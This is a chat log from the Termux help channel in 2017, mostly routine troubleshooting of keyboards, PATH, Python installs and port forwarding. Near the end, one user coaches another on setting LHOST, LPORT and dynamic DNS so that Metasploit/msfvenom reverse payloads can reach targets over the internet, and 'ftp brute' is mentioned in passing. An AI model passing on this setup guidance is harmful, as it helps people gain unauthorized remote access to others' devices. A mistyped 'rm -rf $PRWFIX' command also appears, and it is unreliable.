2017-07-29 03:44:14 gitter (vishalbiswas) sdrausty: `[vishal@VISHAL-PC ~]$ cd AndroidStudioProjects/Splash/
2017-07-29 03:44:14 gitter (vishalbiswas) [vishal@VISHAL-PC Splash]$ find -name build.gradle
2017-07-29 03:44:14 gitter (vishalbiswas) ./build.gradle
2017-07-29 03:44:14 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=597c3ccd45fc670746d825a5]
2017-07-29 03:44:34 gitter (Auxilus) And add path with export $PATH = $HOME/metasploit-framework
?
2017-07-29 03:44:34 sdrausty lol
2017-07-29 03:45:19 gitter (vishalbiswas) @Auxilus it is reset for every session
2017-07-29 03:45:35 gitter (Auxilus) @vishalbiswas what’s the name of that keyboard on page https://termux.com/touch-keyboard.html
2017-07-29 03:46:29 gitter (vishalbiswas) @Auxilus see earlier replies. frumpylava answered u. swiftkey
2017-07-29 03:47:01 gitter (Auxilus) Okay , I missed that comment maybe , ty
2017-07-29 03:47:19 sdrausty The *Then
2017-07-29 03:50:58 sdrausty Gboard works well once you are used to it @Auxilus
2017-07-29 03:51:39 gitter (Auxilus) I am currently using gboard
2017-07-29 03:51:53 sdrausty Great
2017-07-29 03:51:54 gitter (Auxilus) And I am used to it :smile:
2017-07-29 03:52:00 sdrausty lol
2017-07-29 03:52:03 gitter (vishalbiswas) I just use hackers keyboard, who needs prediction, swipe touch, multiple languages
2017-07-29 03:52:13 gitter (vishalbiswas) customizable themes
2017-07-29 03:52:20 gitter (vishalbiswas) emojis
2017-07-29 03:52:38 sdrausty Gboard has this too.
2017-07-29 03:52:48 gitter (Auxilus) Aye I use hackers keyboard too sometimes
2017-07-29 03:53:08 sdrausty I tried it.
2017-07-29 03:53:39 gitter (vishalbiswas) hackers keyboard has none of these
2017-07-29 03:53:44 sdrausty I prefer Gboard ever since we got ctrl+Q
2017-07-29 03:54:21 sdrausty Any way to get pop-ups from ctrl-Q in the near future @forwall
2017-07-29 03:55:11 gitter (Auxilus) @vishalbiswas what’s termux-infeared?
2017-07-29 03:55:12 sdrausty i.e. / pops up to \
2017-07-29 03:55:33 gitter (vishalbiswas) infrared?
2017-07-29 03:56:17 gitter (Auxilus) termux-infeared-transmit
2017-07-29 03:56:21 gitter (Auxilus) From api
2017-07-29 03:56:25 gitter (vishalbiswas) infrared
2017-07-29 03:56:29 gitter (Auxilus) What does it do?
2017-07-29 03:56:47 gitter (vishalbiswas) search for infrared transmitter on google
2017-07-29 03:56:52 gitter (vishalbiswas) some phones have it
2017-07-29 03:56:59 sdrausty Let’s you control Android from Termux.
2017-07-29 03:57:29 gitter (vishalbiswas) the transmitter at the top of a remote (tv) is an IR transmitter
2017-07-29 03:58:04 gitter (Auxilus) K, got it
2017-07-29 03:58:10 sdrausty You can use Termux to change channels on your TV, for instance @Auxilus
2017-07-29 03:58:34 gitter (vishalbiswas) my phone has one, but its vendor locked
2017-07-29 03:58:45 gitter (vishalbiswas) it only works with peel smart remote
2017-07-29 03:58:52 gitter (Auxilus) My other phone has..
2017-07-29 06:49:49 gitter (suryapoo) Is mongodb supported in termux
2017-07-29 07:28:10 gitter (Auxilus) @vishalbiswas Hax4us is also getting errors regarding activesupport gem
2017-07-29 07:48:05 gitter (Auxilus) Why I sometimes can’t cd in dirs though shell script?
2017-07-29 08:05:36 gitter (vishalbiswas) @suryapoo no, not yet. and it may be a while if it’s implemented, if ever
2017-07-29 08:22:00 gitter (suryapoo) @vishalbiswas cool
2017-07-29 11:31:54 gitter (Auxilus) I have a script running on localhost and on port 65000, how can I use ngrok to use it remotely over Wan?
2017-07-29 12:17:38 gitter (Auxilus) ?
2017-07-29 12:26:50 sdrausty @Auxilus You need to source your script to use it to cd
.
2017-07-29 12:29:38 sdrausty @Auxilus You can do this by using .
for example . script
2017-07-29 12:33:41 sdrausty @Auxilus Add an alias to .bashrc
and it sources the script automatically, for example add alias script='. script' to
.bashrc`
2017-07-29 12:34:29 gitter (Auxilus) Hey man
2017-07-29 12:34:50 gitter (Auxilus) You ever used ngrok?
2017-07-29 12:35:11 sdrausty What’s ngrok?
2017-07-29 12:36:53 sdrausty alias script='. script' *
alias s=’. script’
2017-07-29 12:42:47 sdrausty @Auxilus How is build APKs working for you?
2017-07-29 12:44:13 gitter (Auxilus) Not sure exactly, made an apk with sample from your repo
2017-07-29 12:45:02 gitter (Auxilus) But I really don’t know how I can build apk of termux:widget out of the app code on github
2017-07-29 12:45:42 gitter (sdrausty) Great it built on your device. What device did you use?
2017-07-29 12:47:05 gitter (sdrausty) Termux apps do not build with this system yet, but @vishalbiswas gave me a couple good clues so maybe they will compile too.
2017-07-29 12:48:04 gitter (Auxilus) @sdrausty im on op2
2017-07-29 12:48:58 gitter (Auxilus) @sdrausty do you have something like . /BUILD APP. share <app_src_dir> appname
?
2017-07-29 12:49:18 gitter (Auxilus) I got typo
2017-07-29 12:49:18 gitter (sdrausty) ?
2017-07-29 12:49:53 gitter (sdrausty) op2?
2017-07-29 12:50:02 gitter (Auxilus) It should be . /build app < app directory>
2017-07-29 12:50:10 gitter (Auxilus) One plus 2
2017-07-29 12:50:17 gitter (Auxilus) Shiiitttt
2017-07-29 12:50:27 gitter (Auxilus) buildAPP.sh
2017-07-29 12:51:59 sdrausty buildAPP.sh?
2017-07-29 12:52:47 gitter (Auxilus) Your script
2017-07-29 12:52:59 sdrausty 64G wow
2017-07-29 12:54:25 sdrausty There is no buildAPP.sh in https://github.com/sdrausty/buildAPKs
2017-07-29 12:55:24 sdrausty https://github.com/sdrausty/buildAPKs/tree/master/scripts/build
2017-07-29 12:55:54 gitter (Auxilus) It was a suggestion
2017-07-29 12:56:39 sdrausty oh
2017-07-29 12:57:39 sdrausty Thank you @Auxilus
2017-07-29 12:58:26 gitter (Auxilus) can you implement it?
2017-07-29 12:59:47 sdrausty I’ll see. Maybe. It sounds like a good idea:)
2017-07-29 13:01:50 sdrausty How is sourcing cd scripts with .
working for you. It makes navigating from the command line a breeze.
2017-07-29 13:02:19 sdrausty When you add an alias to .bashrc
2017-07-29 13:04:12 gitter (Auxilus) I don’t really need that to be done, but my frnd got error with that, so I just asked it here :p
2017-07-29 13:09:06 sdrausty It took me a while to figure out how to cd with scripts effectively.
2017-07-29 13:11:23 gitter (Auxilus) Sry if I wasted your time sdrausty
2017-07-29 13:12:23 gitter (Hax4us) 😁sdrausty is bot ?
2017-07-29 13:15:08 gitter (Auxilus) Nay
2017-07-29 13:15:10 gitter (Auxilus) He is not
2017-07-29 13:16:26 gitter (Auxilus) @Hax4us why?
2017-07-29 13:16:50 sdrausty Why do you think I am a bot @Hax4us ?
2017-07-29 13:17:44 gitter (Hax4us) Srry…but..IRC/Gitter bot is written…that’s why
2017-07-29 13:17:50 gitter (Auxilus) Lol
2017-07-29 13:17:50 gitter (Auxilus) I think that’s bcz your name is shown under @TermuxBot
2017-07-29 13:17:51 sdrausty We could use a good info bot here at #termux
2017-07-29 13:18:17 sdrausty Something that answers FAQs
2017-07-29 13:18:28 gitter (Auxilus) sdrausty:you prefer irc over gitter?
2017-07-29 13:19:02 sdrausty In fact Termux could have an FAQ
2017-07-29 13:19:23 gitter (Auxilus) Faq page?
2017-07-29 13:19:32 gitter (Auxilus) Sure, nice idea
2017-07-29 13:19:38 sdrausty @Auxilus I am enjoying both gitter and irc
2017-07-29 13:20:21 gitter (Auxilus) :smile:
2017-07-29 13:20:32 Auxilus VTyo
2017-07-29 13:20:48 Auxilus @sdrausty, hi man, I’m on irc too
2017-07-29 13:20:55 sdrausty cool
2017-07-29 13:21:32 Auxilus Do you get to view history of conversations while you were not logged in here?
2017-07-29 13:22:04 sdrausty IRC/Gitter bot is way cool
2017-07-29 13:23:08 sdrausty I have created an automated page https://sdrausty.github.io/logs/ircFreenodeTermuxWeechatlog
2017-07-29 13:23:48 sdrausty It helps me study what’s going on here #termux
2017-07-29 13:24:17 sdrausty All that scrolling in gitter is anoying
2017-07-29 13:25:18 gitter (Auxilus) Ye 😁
2017-07-29 13:25:20 sdrausty Maybe this page will evolve into FAQ or FAQ #termux bot
2017-07-29 13:26:02 gitter (Auxilus) Wwttthhh
2017-07-29 13:26:47 gitter (Auxilus) You got whole gitter history stored??!
2017-07-29 13:26:57 sdrausty Sometimes I see users asking simple questoins #termux but there is no one to answer
2017-07-29 13:27:19 gitter (Hax4us) 😊yes u r right
2017-07-29 13:27:29 sdrausty No but I would like to
2017-07-29 13:27:48 gitter (themastersunil) can i install setoolkit in termux???? without root.
2017-07-29 13:28:23 gitter (themastersunil) anyone is here?????
2017-07-29 13:28:55 gitter (Auxilus) @themastersunil
2017-07-29 13:29:10 gitter (Auxilus) We don’t have Ll dependencies for setooklit
2017-07-29 13:29:55 gitter (themastersunil) okk
2017-07-29 13:30:33 gitter (themastersunil) now for rooted phone, have any LI dependencies?
2017-07-29 13:32:14 gitter (Hax4us) Nop..BRo..just wait for that…
2017-07-29 13:32:57 gitter (themastersunil) ok
2017-07-29 13:34:13 gitter (Auxilus) @themastersunil not Like dependencies
2017-07-29 13:34:19 gitter (Auxilus) Sry it was typo
2017-07-29 13:34:35 gitter (themastersunil) typo???
2017-07-29 13:34:35 gitter (Auxilus) I meant to say ‘all dependencies’
2017-07-29 13:36:07 gitter (Auxilus) Typo = typing mistake
2017-07-29 13:37:59 sdrausty Wait or make it happen with https://github.com/termux/termux-packages/pulls
2017-07-29 13:38:12 sdrausty ?
2017-07-29 13:43:29 gitter (Auxilus) sdrausty : are you gonna create termux-faq?
2017-07-29 13:44:19 sdrausty @Auxilus I have made a command cd
which places me in com.termux on my external SDcard. You can see a screenshot of this command in action at https://github.com/termux/termux-packages/issues/1176
2017-07-29 13:44:51 sdrausty @Auxilus Considering it.
2017-07-29 13:45:34 sdrausty cd
*cdt
2017-07-29 13:45:51 gitter (themastersunil) @Hax4us Hey you know abou it
2017-07-29 13:45:54 gitter (themastersunil) curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall
2017-07-29 13:46:14 gitter (themastersunil) how to install metasploit using it.
2017-07-29 13:46:39 sdrausty Three keys, then enter and whoa
2017-07-29 13:48:25 sdrausty @Auxilus Making an FAQ should not be too difficult if we had access to the entire log for #termux
2017-07-29 13:49:17 gitter (Auxilus) sdrausty : you gonna put it on wiki or on github?
2017-07-29 13:49:35 gitter (Auxilus) I can get you some noobie questions
2017-07-29 14:05:32 gitter (suryapoo) Bitbucket for termux?
2017-07-29 14:05:42 gitter (suryapoo) Git is there …
2017-07-29 14:20:29 sdrausty Write then up and submit at https://github.com/sdrausty/sdrausty.github.io/pulls I’ll be glad to add an FAQ page to https://sdrausty.github.io @Auxilus
2017-07-29 14:21:41 sdrausty It can be easily uploaded to wiki.termux.com too
2017-07-29 14:22:28 sdrausty I am not thrild the wiki requires a seperate login.
2017-07-29 14:22:57 sdrausty No login wiki would be way cool.
2017-07-29 14:24:56 sdrausty Immature pages on wikipedia allow anonymous editting.
2017-07-29 14:45:45 cjp Any pitfalls with changing shell via chsh to zsh? I’m running into an issue where when I restart termux after a bunch of customization, no commands work… “The program ‘pkg’ is not installed…”
2017-07-29 14:46:07 cjp Wondering if my changing of the shell to zsh broke things.
2017-07-29 14:46:27 sdrausty bash is bash
2017-07-29 14:49:32 cjp I launch termux and I get 30 or so $ prompts, as if someone had held down enter for awhile. Then no commands work. Quite odd.
2017-07-29 14:52:58 cjp sdrausty: good advice. bash obeys PATH just as always. PATH is fubared.
2017-07-29 14:53:10 cjp Hence bash can’t run anything :)
2017-07-29 15:12:07 zack_ I’m using the latest developer build of Chrome OS: Version 61.0.3163.13 (Official Build) dev (64-bit) and getting this error from rsync:
2017-07-29 15:12:22 zack_ CANNOT LINK EXECUTABLE “rsync”: cannot locate symbol “__moddi3” referenced by “/usr/bin/rsync”… [1] 7764 abort (core dumped) rsync
2017-07-29 15:12:38 zack_ anyone else seeing the same problem?
2017-07-29 15:17:48 sdrausty cjp: Are you using Gboard? I had to downgrade Gboard after yesterdays Google Play update. It was not working correctly.
2017-07-29 15:22:20 sdrausty zack_: rsync
works. Try apt update && apt upgrade
2017-07-29 15:57:56 cjp sdrausty: no Gboard. I’ve got it sorted now… I messed with the PATH, that’s what broke it. I’m still getting the weirdness like someone hitting a bunch of newlines upon startup, but it seems only cosmetic.
2017-07-29 15:58:16 cottongin it does that for me too
2017-07-29 15:58:20 cottongin i thought it was a chromeos thing
2017-07-29 15:58:33 cottongin if you hit a key on the keyboard to interrupt it it stops
2017-07-29 15:58:41 cjp cottongin: same exact issue.
2017-07-29 15:58:53 cjp cottongin: also on a chromeos box.
2017-07-29 15:59:01 cottongin so maybe it is a chromeos thing
2017-07-29 15:59:12 cottongin it’s like the enter key is stuck or something
2017-07-29 15:59:14 cottongin lol
2017-07-29 15:59:26 cjp again, cosmetic, so not worth too much effort.
2017-07-29 15:59:38 cottongin yeah i just hit a key and ignore it
2017-07-29 15:59:49 cjp I thought that issue was linked with the issue caused by my breaking the PATH. :)
2017-07-29 16:00:07 cottongin i haven’t messed with PATH at all so probably not linked
2017-07-29 16:00:23 cjp As sdrausty indicated above… the shell is the shell. Normal rules apply. :)
2017-07-29 16:00:49 cjp Yeah, now that I leave the location of the binaries in the PATH, things actually work. What a surprise! :)
2017-07-29 16:16:03 gitter (sdrausty) @suryapoo
2017-07-29 16:16:33 gitter (sdrausty) https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice
2017-07-29 16:35:22 gitter (sdrausty) @H
2017-07-29 16:38:31 sdrausty @Hax4us lol
2017-07-29 16:39:58 sdrausty @Hax4us Gitterbot merges irc chat to gitter chat.
2017-07-29 16:40:20 sdrausty to *with
2017-07-29 19:34:00 sdrausty https://github.com/termux/termux-packages/issues/1176
2017-07-29 23:43:02 gitter (suryapoo) @sdrausty ..thanks man!!
2017-07-29 23:51:17 sdrausty @suryapoo You are welcome! :)
2017-07-30 00:45:47 gitter (Auxilus) sdrausty : Let me know when you create faq page, im not really much used to .md
pages
2017-07-30 00:46:49 gitter (Auxilus) Looks like your github site has all .md
pages
2017-07-30 01:01:17 sdrausty markdown is simple https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet @Auxilus
2017-07-30 01:06:45 gitter (Auxilus) sdrausty : I was hoping that you will create just template, basic structure for page, and ill edit it to add faqs and other info
2017-07-30 01:12:17 sdrausty @Auxilus: Please submit a text file at of the FAQ at https://github.com/sdrausty/sdrausty.github.io/issues when you find the time. I will be glad to format and post it, possibly as a link on https://sdrausty.github.io/pages/asac
2017-07-30 01:13:01 gitter (Auxilus) sdrausty : sure
2017-07-30 01:13:13 gitter (Auxilus) Ill start digging for faqs
2017-07-30 01:13:33 gitter (Auxilus) How do many we want?
2017-07-30 01:13:36 gitter (Auxilus) 10?
2017-07-30 01:34:05 sdrausty 10 sounds like a great beginning!
2017-07-30 01:44:31 gitter (suryapoo) Hi guys..happy sunday !!..can anyone help me with this node server issue..
2017-07-30 01:45:24 gitter (suryapoo) The server is running at port 9000 on termux ..but when i browse via my web browser ..i get “origin 504 status” error..but when i use curl
2017-07-30 01:45:27 gitter (suryapoo) Its fine..
2017-07-30 01:45:42 gitter (suryapoo) Its driving me crazy..pls help.
2017-07-30 05:06:49 gitter (suryapoo) Update:..its working now..
2017-07-30 05:08:15 gitter (Auxilus) Is it running on localhost successfully?
2017-07-30 05:09:00 gitter (suryapoo) Yup..
2017-07-30 05:09:10 gitter (suryapoo) Was due to custom rom i guess
2017-07-30 05:09:10 gitter (Auxilus) Try ngrok
2017-07-30 05:09:14 gitter (suryapoo) Back to stock
2017-07-30 05:09:26 gitter (suryapoo) Whats ngrok
2017-07-30 05:09:58 gitter (Auxilus) Ngrok is nice to forward your page/script from localhost to WAN
2017-07-30 05:10:57 gitter (suryapoo) Ohhh…okay man thanks
2017-07-30 05:11:21 gitter (Auxilus) Np i discovered it yesterday only
2017-07-30 05:12:51 gitter (suryapoo) Ohhh…
2017-07-30 05:13:25 gitter (suryapoo) Dude if i have a remote git repo ..and i want to use it in termux..should i pull it or clone it
2017-07-30 05:14:11 gitter (Auxilus) Ye you can commit /merge
2017-07-30 05:16:43 gitter (suryapoo) So i shud pull it?
2017-07-30 05:17:22 gitter (Auxilus) Clone it
2017-07-30 05:18:03 gitter (suryapoo) Okay coool..
2017-07-30 06:22:17 live_the_dream ummm iv got an arm build of n0dejs-current uploading currently…
2017-07-30 06:23:41 live_the_dream also added ghostscript from grimler
2017-07-30 06:40:02 gitter (suryapoo) Whats ghostscript?
2017-07-30 06:52:23 live_the_dream Ghostscript is an interpreter for PostScript™ and Portable Document Format (PDF)
2017-07-30 08:08:21 gitter (bitcoinmeetups) Hello. Is it possible to connect Termux to an X-server running locally on the mobile phone or something? If not, I would like to add it as a feature request. Termux is already the best Terminal app as far as I can tell and with an X-server or something it could be the best Linux emulator altogether on Android.
2017-07-30 08:15:11 gitter (Grimler91) @live_the_dream nice! Could you add a comment about it on the pull request I opened?
2017-07-30 08:39:05 gitter (suryapoo) @TermuxBot coool..
2017-07-30 08:39:22 u0_a83 hi. need a keyboard w/arrlw keys. could anybody tell me which one were used for the screenshots on https://termux.com/touch-keyboard.html ?
2017-07-30 09:05:42 gitter (suryapoo) U can use hacker’s keyboard.. It is like a computer keyboard
2017-07-30 09:20:11 u0_a83 thanks gitter. is it on fdroid?
2017-07-30 09:21:28 u0_a83 yes, it is.
2017-07-30 09:33:54 u0_a83 ok tHats t
2017-07-30 09:37:08 u0_a83 ok thats to small for my smalland has other disadvantages. if sb knows which k3yboard was usedthere or how to add just arrow keys to termux, let me know.
2017-07-30 09:53:51 Gloubi Hello
2017-07-30 10:21:47 gitter (Auxilus) u0_a83: its swiftkey, i asked same question the other day :p
2017-07-30 10:30:35 gitter (Techzindia) Can i run .bat file in Termux??
2017-07-30 10:59:04 gitter (scsarfa) Anyone, please help me for install metasploit on my termux??
2017-07-30 11:00:56 gitter (Techzindia) @scsarfa uninstall termux and reinstall then try my Script
2017-07-30 11:01:06 gitter (Techzindia) curl -LO https://raw.githubusercontent.com/Techzindia/Metasploit_For_Termux/master/metasploitTechzindia.sh
2017-07-30 11:02:37 gitter (Grimler91) @Techzindia .bat (batch) files are scripts for windows so won’t work in termux
2017-07-30 11:02:38 gitter (Auxilus) Wth
2017-07-30 11:03:26 gitter (Auxilus) Everyone is pirating mah script 😕😯😅
2017-07-30 11:07:06 gitter (scsarfa) Does it need anything else????
2017-07-30 11:07:08 gitter (kuburan) @Auxilus what about msfdb ?
2017-07-30 11:07:09 gitter (kuburan) any update
2017-07-30 11:57:45 gitter (Auxilus) @kuburan no man, there is some problem with schema.rb
script in Metasploit
2017-07-30 11:58:17 gitter (Auxilus) Imma get back to it once i get a lil free
2017-07-30 11:58:25 gitter (Techzindia) @Auxilus 😛🤗🤗😉
2017-07-30 11:58:51 gitter (Auxilus) Ive created the script, it creates yml
too, but schema gives errors
2017-07-30 12:02:05 gitter (Auxilus) @Techzindia im fine with it till someone doest take credit for it 😉
2017-07-30 12:05:10 gitter (Auxilus) @Techzindia batch file is more like shell script in linux, you think it as shell script for windows
2017-07-30 12:06:28 gitter (Techzindia) Your base script is veryuseful And My watchers are happy And Good response you also check my YT Channel www.Youtube.com/TechZindia
2017-07-30 12:07:11 gitter (Auxilus) Nah man
2017-07-30 12:07:21 gitter (Auxilus) Credit goes to @vishalbiswas
2017-07-30 12:07:29 gitter (Auxilus) I just automated the process
2017-07-30 12:08:26 gitter (themastersunil) sir I flashed new rom but, stiill install python after 96% it stopped and phone lag………..
2017-07-30 12:08:42 gitter (themastersunil) please solve my issue.
2017-07-30 12:09:54 gitter (Auxilus) Mayne your custom rom is messing with it, can you try it without the custom rom?
2017-07-30 12:10:33 gitter (Techzindia) @Auxilus ya @vishalbiswas also A great man he make A Easy Method For this
2017-07-30 12:11:35 gitter (Auxilus) @Techzindia subscribed 😊
2017-07-30 12:12:15 gitter (Techzindia) @Auxilus i copy a com.termux folder only included python,python2 but how i help @themastersunil
2017-07-30 12:12:46 gitter (Techzindia) @Auxilus Thanks For Supporting 😄
2017-07-30 12:13:23 gitter (Auxilus) @Techzindia there must be problem with his rom, cz if he cant install it via apt install python
then building it from source could also fail
2017-07-30 12:14:34 gitter (Auxilus) @Techzindia you got nice views man
2017-07-30 12:14:53 gitter (Auxilus) What language do you talk in?
2017-07-30 12:16:42 gitter (Auxilus) Looks like termux is in high demand these days :p
2017-07-30 12:16:51 gitter (Techzindia) India national language “hindi”
2017-07-30 12:17:21 gitter (Techzindia) Ya @Auxilus Termux is A high demand in a last few months
2017-07-30 12:17:28 gitter (Auxilus) ‘k
2017-07-30 12:17:49 gitter (Techzindia) @Auxilus but where Are You From? 😊
2017-07-30 12:17:51 gitter (themastersunil) My rom is flyme 6
2017-07-30 12:17:52 gitter (Auxilus) Wha? I see technical sherma made a video about termux
2017-07-30 12:18:59 gitter (Auxilus) @themastersunil we haven’t tested termux on custom roms ( i got oxygen os, but it seems to work on my device) maybe ask @fornwall or @vishalbiswas
2017-07-30 12:19:00 gitter (themastersunil) @Auxilus can i copy other phone *com.termux folder into my phone, with python
2017-07-30 12:19:24 gitter (Techzindia) Ya And Also a “vasu chauhan” named channel Copy my Content…
2017-07-30 12:19:37 gitter (themastersunil) 😂
2017-07-30 12:19:38 gitter (Auxilus) Aye, you can, but not sure if even then you can run python
2017-07-30 12:19:56 gitter (themastersunil) why?
2017-07-30 12:20:17 gitter (Auxilus) You can try tho
2017-07-30 12:20:38 gitter (Auxilus) Installation fails means something is going wrong in there
2017-07-30 12:20:38 gitter (themastersunil) okk I’ll try, but my phone is no rooted.
2017-07-30 12:20:58 gitter (Techzindia) @Auxilus I use Termux With Custom Rom #AOSP Extended and i use LenovoA6000 but my stock rom is too borring
2017-07-30 12:22:17 gitter (themastersunil) @Techzindia check my whatsapp msg.
2017-07-30 12:24:50 gitter (themastersunil) @Auxilus Please solve my issues
2017-07-30 12:25:12 gitter (themastersunil) @Auxilus python2 is install proper
2017-07-30 12:25:36 gitter (themastersunil) but python 3.6 is not install……
2017-07-30 12:40:19 gitter (Auxilus) Whats the error in python 3.6?
2017-07-30 13:04:35 gitter (themastersunil) 96% complete…… Not work it not complet 100%
2017-07-30 13:05:33 gitter (themastersunil) it not complet 100%
2017-07-30 13:13:42 gitter (themastersunil) ecting previously unselected package openssl.
2017-07-30 13:13:42 gitter (themastersunil) Preparing to unpack …/openssl_1.0.2l_aarch64.deb …
2017-07-30 13:13:42 gitter (themastersunil) Unpacking openssl (1.0.2l) …
2017-07-30 13:13:42 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=597e13c22723db8d5e5cf646]
2017-07-30 13:13:56 gitter (themastersunil) @Auxilus see
2017-07-30 13:14:16 gitter (themastersunil) 96% after not complet 100%
2017-07-30 13:14:35 gitter (themastersunil) or my phone lag
2017-07-30 13:20:28 gitter (themastersunil) anyone is here????
2017-07-30 13:22:56 gitter (themastersunil) $ pkg search python
2017-07-30 13:22:56 gitter (themastersunil) Hit:1 http://termux.net stable InRelease
2017-07-30 13:22:56 gitter (themastersunil) E: dpkg was interrupted, you must manually run ‘dpkg –configure -a’ to correct the problem.
2017-07-30 13:22:56 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=597e15ef4bcd78af56fb9a81]
2017-07-30 13:23:26 gitter (themastersunil) No any response…….
2017-07-30 13:29:16 gitter (Auxilus) Not a lag
2017-07-30 13:30:32 gitter (Auxilus) @themastersunil Must be some problem regarding your rom, best way is to create issue on github
2017-07-30 13:31:59 gitter (vishalbiswas) not a problem with rom. uninstall python and remove $PREFIX/lib/python36 and reinstall
2017-07-30 13:55:25 sdrausty @vishalbiswas I want more space on device and I think you do too what do you think of issue 1176
2017-07-30 13:56:50 sdrausty in termux-packages?
2017-07-30 13:58:01 sdrausty I have rewritten #1176 the clarify it.
2017-07-30 13:58:19 sdrausty the *to
2017-07-30 13:58:55 gitter (themastersunil) @vishalbiswas my phone is not rooted, how can i remove this $PRWFIX/lib/python36
2017-07-30 13:59:59 sdrausty rm -rf $PRWFIX/lib/python36
2017-07-30 14:00:13 gitter (themastersunil) 😃
2017-07-30 14:01:46 gitter (themastersunil) I’ll apply this command in cd dir..
2017-07-30 14:03:16 sdrausty That is where it should be applied. I am glad to hear that your phone is not rooted. We loose too many phones that way.
2017-07-30 14:04:35 gitter (themastersunil) 😂
2017-07-30 14:04:42 sdrausty Now making an OS (Operating System) in Termux for your smartphone and flashing it from the SD card. That is a completely different topic:)
2017-07-30 14:04:57 sdrausty https://plus.google.com/104092656004159577193/posts/4QGxJc3Ft3N
2017-07-30 14:08:09 sdrausty How feasible is it to build http://www.cyanogenmods.org in Termux?
2017-07-30 14:08:20 sdrausty Anyone?
2017-07-30 14:15:57 gitter (Ashish882) Hi
2017-07-30 14:20:11 gitter (Auxilus) How can i remove the intro message whem
2017-07-30 14:20:12 gitter (Auxilus) When i start new session?
2017-07-30 14:21:30 gitter (sdrausty) @Ashish882 Hello
2017-07-30 14:21:35 gitter (Ashish882) Hi
2017-07-30 14:21:53 gitter (sdrausty) @Ashish882 How are you?
2017-07-30 14:22:00 gitter (Ashish882) Fine
2017-07-30 14:22:27 gitter (Auxilus) @sdrausty
2017-07-30 14:22:33 gitter (Auxilus) Any idea?
2017-07-30 14:22:34 gitter (Ashish882) Is there any way to forward my IP free for 30 day or more
2017-07-30 14:22:51 gitter (Ashish882) To use in metasploit
2017-07-30 14:22:52 gitter (Auxilus) Noip website
2017-07-30 14:22:53 gitter (sdrausty) @Ashish882 Great 😀 How is Termux working for you?
2017-07-30 14:23:00 gitter (Ashish882) Nice…
2017-07-30 14:23:22 gitter (Auxilus) @sdrausty any idea how can i get rid of intro message?
2017-07-30 14:24:12 gitter (Auxilus) @Ashish882 you can use noip website ( I often use it for Metasploit)
2017-07-30 14:24:36 gitter (Ashish882) In termux
2017-07-30 14:24:51 gitter (Ashish882) How you use it in termux
2017-07-30 14:25:00 gitter (Ashish882) I get error
2017-07-30 14:25:50 gitter (Ashish882) @Auxilus I put in lhost : myhostname.ddns.net or lport 4444
2017-07-30 14:26:15 gitter (Ashish882) Or in lisner my public IP or lport 4444
2017-07-30 14:26:29 gitter (Ashish882) But it don’t work
2017-07-30 14:26:39 gitter (Ashish882) @Auxilus
2017-07-30 14:26:44 gitter (Ashish882) Help bro
2017-07-30 14:27:05 gitter (sdrausty) @Auxilus I thought I saw that as a topic at https://github.com/termux/termux-app/issues checked, but couldn’t find it. Post an issue about modifying the (or customizing) the intro message please.
2017-07-30 14:27:32 gitter (Auxilus) Register a domain name on noip ( free ofc), then put your dynamic ip in domain settings (you can get your dynamic by searching ‘whats my ip’ on google)
2017-07-30 14:28:08 gitter (Auxilus) @sdrausty got solution
2017-07-30 14:28:23 gitter (Ashish882) OK I try
2017-07-30 14:28:33 gitter (sdrausty) @Ashish882 That’s good to hear we are happy Termuxers.
2017-07-30 14:28:38 gitter (Auxilus) @Ashish882 then use domain yourdomain. hopto.com
etc in msfvenom
2017-07-30 14:28:47 gitter (Ashish882) Hmmm
2017-07-30 14:28:52 gitter (Ashish882) Or lport
2017-07-30 14:30:55 gitter (Ashish882) @Auxilus in lisner I have to put my dynamic IP
2017-07-30 14:31:34 gitter (Auxilus) And in exploit settings inside Metasploit use your LAN ip as LHOST
2017-07-30 14:32:26 gitter (Ashish882) Yes but lport
2017-07-30 14:32:30 gitter (Ashish882) 4444
2017-07-30 14:32:40 gitter (Auxilus) In listner, use yo local LAN ip
2017-07-30 14:32:59 gitter (Auxilus) Lport can be anything
2017-07-30 14:33:40 gitter (Auxilus) Ofc lport in msfvenom and exploit settings should be same
2017-07-30 14:33:51 gitter (Ashish882) OK
2017-07-30 14:33:53 gitter (Ashish882) Thanks
2017-07-30 14:34:08 gitter (Auxilus) Its a good practice to use a non assigned port for personal use
2017-07-30 14:34:16 gitter (Auxilus) You can use port 65000
2017-07-30 14:34:21 gitter (Ashish882) OK
2017-07-30 14:34:37 gitter (Ashish882) Now it will work for 30 days
2017-07-30 14:34:43 gitter (Auxilus) Cz 4444 might have some service running on it
2017-07-30 14:34:53 gitter (Ashish882) Hmm
2017-07-30 14:35:02 gitter (Auxilus) Nah, your domain will be live for 30 days
2017-07-30 14:35:38 gitter (Auxilus) But you have to reset domain setting with yo new dynamic ip and create new payload each time you change ip
2017-07-30 14:36:00 gitter (Ashish882) Ohh no
2017-07-30 14:36:14 gitter (Ashish882) Then ngrok is better
2017-07-30 14:36:24 gitter (Auxilus) Dude, hackings not that easy
2017-07-30 14:36:34 gitter (Ashish882) I know
2017-07-30 14:37:01 gitter (Auxilus) Ngrok might fail if you are running ftp brute or something else
2017-07-30 14:37:23 gitter (Ashish882) @Auxilus do you know other tools of m metasploit
2017-07-30 14:37:26 gitter (Ashish882) OK
2017-07-30 14:37:46 gitter (sdrausty) @Ashish882
2017-07-30 14:38:04 gitter (sdrausty) https://en.m.wikipedia.org/wiki/Dynamic_DNS
2017-07-30 14:38:35 gitter (Auxilus) Tho it can forward port, even then also you have to create new payload
2017-07-30 14:38:35 gitter (Auxilus) Or else
2017-07-30 14:38:35 gitter (Auxilus) You can buy static ip from your isp
2017-07-30 14:38:58 gitter (Ashish882) Hmm
2017-07-30 14:40:55 gitter (Ashish882) Where I know about uses of other tools of metasploit
2017-07-30 14:42:11 gitter (sdrausty) @Ashish882 ATT has IP8 They give you a block of IPs
2017-07-30 14:42:51 gitter (Ashish882) Mean
2017-07-30 14:42:54 gitter (sdrausty) It used to be quite cheap addon
2017-07-30 14:43:06 gitter (Auxilus) Im not sure how much ATT is providing service in India
2017-07-30 14:43:15 gitter (sdrausty) OK
